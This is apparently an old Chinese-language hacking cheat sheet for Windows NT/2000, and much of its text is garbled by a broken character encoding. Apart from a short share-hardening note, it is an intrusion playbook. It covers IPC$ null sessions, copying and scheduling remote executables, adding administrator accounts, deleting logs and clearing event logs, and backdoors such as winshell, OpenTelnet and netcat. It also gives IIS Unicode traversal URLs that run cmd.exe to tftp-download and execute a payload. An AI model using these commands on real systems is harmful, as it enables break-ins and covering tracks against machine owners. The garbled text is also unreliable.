"RestrictAnonymous"=dword:00000001
Note that a blank line must follow the first line or the import will not succeed. Here AutoShareServer corresponds to the C$, D$ and similar default shares, AutoSharewks corresponds to the ADMIN$ default share, and RestrictAnonymous corresponds to IPC$ connections.
ķҲͨ139445˿ͨIPC$֣Ϊû139445˿ڵ֧޷IPC$ģ139445˿ֹͬIPC$֡139˿ڿֹͨNBTΣǣѡ񱾵ӡTCP/IPԡ߼WINSTCP/IPϵNETBIOSɣͼ1445˿ڿͨ޸עηǣעHKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters£½ԤDWORDֵSMBDeviceEnabledֵΪ0Ȼ޸ɡ 

Commonly used NET commands

==================================================

1. ֪Էip鿴Էļ
ʼ->->cmd->net view Էip
 ʼ->->cmd->nbtstat -a Էip

2. ֪Է鿴Էip
ʼ->->cmd->ping Է
 ʼ->->cmd->nbtstat -a Է

Remote null connection: net use \\<IP address>\ipc$ "" /user:""

Log on to the remote host as administrator: net use \\<IP address>\ipc$ "" /user:"Administrator"

ļԶWINNTĿ¼£copy Ŀ¼·\ \\IPַ\admin$ 

鿴Զʱ䣩 net time \\IPַ 

ʱĳ at \\IPַ 02:18 readme.exe 

鿴 net view \\IPַ 

鿴netbiosб nbtstat -A IPַ 

ԶCӳΪԼF̣ net use f: \\IPַ\c$ " " /user:" Administrator" 

ԼӵԱ飩 net user û  /add 

net localgroup Administrators û /add 

Ͽӣ net use \\IPַ\ipc$ /delete 

===================================================== 

ƨƨ 

del C:\winnt\system32\logfiles\*.* 

del C:\winnt\system32\config\*.evt 

del C:\winnt\system32\dtclog\*.* 

del C:\winnt\system32\*.log 

del C:\winnt\system32\*.txt 

del C:\winnt\*.txt 

del C:\winnt\*.log 

============================ 

һnetsvc.exe 

ֱгϵķĿѰԶġ ʱ  

netsvc /list \\IPַ 

netsvc schedule \\IPַ /query 

netsvc \\IPַ schedule /start 

OpenTelnet.exe 

ԶTelnet񣬲󶨶˿ڵ7878磺 

OpenTelnet \\192.168.1.103 Administrators  1 7878 

ȻͿtelnet7878˿ڣDOSʽ£ 

telnet IPַ 7878 

winshell.exe 

һǳСľ6Ktelnet7878˿ڣwinshellCMD> 󣬿ɴ 

p Path 鿴winshell·Ϣ 

b reBoot  

d shutDown رջ 

s Shell ִкͻῴɰġ C:\>   

x eXit ˳ε¼ỰֹwinshellУ 

CMD> http://.../srv.exe ͨhttpվϵļwinshellĻϣ 

ġ3389½GUIʽ¼Զ 

塢elsave.exe 

¼־ 

elsave -s \\IPַ -l " application" -C 

elsave -s \\IPַ -l " system" -C 

elsave -s \\IPַ -l " security" -C 

ִкɹӦó־ϵͳ־ȫ־ 

hbulot.exe 

win2kserverwinxp3389 

hbulot [/r] 

ʹ/rʾװɺԶĿʹЧ 

ߡnc.exe(netcat.exe) 

һܺõĹߣһЩűҪõҲá 

Ҫӵĳ: nc [-options] hostname port[s] [ports] ... 

󶨶˿ڵȴ: nc -l -p port [-options] [hostname] [port] 

: 

-e prog ضһӣִ [Σ!!] 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, ... 

-h Ϣ 

-i secs ʱļ 

-l ģʽվ 

-n ֵָIPַhostname 

-o file ¼16ƵĴ 

-p port ض˿ں 

-r ָؼԶ̶˿ 

-s addr Դַ 

-u UDPģʽ 

-v ϸ  -vɵõϸ 

-w secs timeoutʱ 

-z ص  ɨʱ 

ˡTFTPD32.EXE 

ԼĵʱΪһ̨FTP⼦ļtftpҪ⼦ִУͨҪUnicode©telnet⼦磺 

http://IPַ/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i IPַ get ļ c:\winnt\system32\ļ 

ȻֱļУ 

http://IPַ/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+ļ 

šprihack.exeIISprinterԶ̻ߡidqover.exeidqģѡ һ˿ڼ Ȼtelnetļ˿ڣɹһĶ˿ڣ󶨵ִСxploit.exeһͼνidaɹԺwinxpҪwinxp 

һntis.execmd.execmdasp.aspcgi-backdoorexeҪŵcgi-binĿ¼£aspŵASPִȨ޵Ŀ¼ȻIEӡ 

һһ Xscanв˵ 

ڼУ" [ո]" Բ鿴߳״̬ɨȣ" q" 浱ǰݺǰ˳򣬰" " ǿйرճ 

1.ʽ: xscan -host [-] [ѡ] 

xscan -file [ѡ] 

 : 

-port : ⳣ÷Ķ˿״̬(ͨ\dat\config.iniļ" PORT-SCAN-OPTIONS\PORT-LIST" ƴ˿б) 

-ftp : FTP(ͨ\dat\config.iniļû/ֵļ) 

-ntpass : NT-Server(ͨ\dat\config.iniļû/ֵļ) 

-cgi : CGI©(ͨ\dat\config.iniļ" CGI-ENCODE\encode_type" ñ뷽) 

-iis : IIS©(ͨ\dat\config.iniļ" CGI-ENCODE\encode_type" ñ뷽) 

[ѡ] : 

-v: ʾϸɨ 

-p: Pingͨ 

-o: ûм⵽Ŷ˿ڵ 

-t : ָ󲢷߳Ͳ, ĬΪ100,10
 
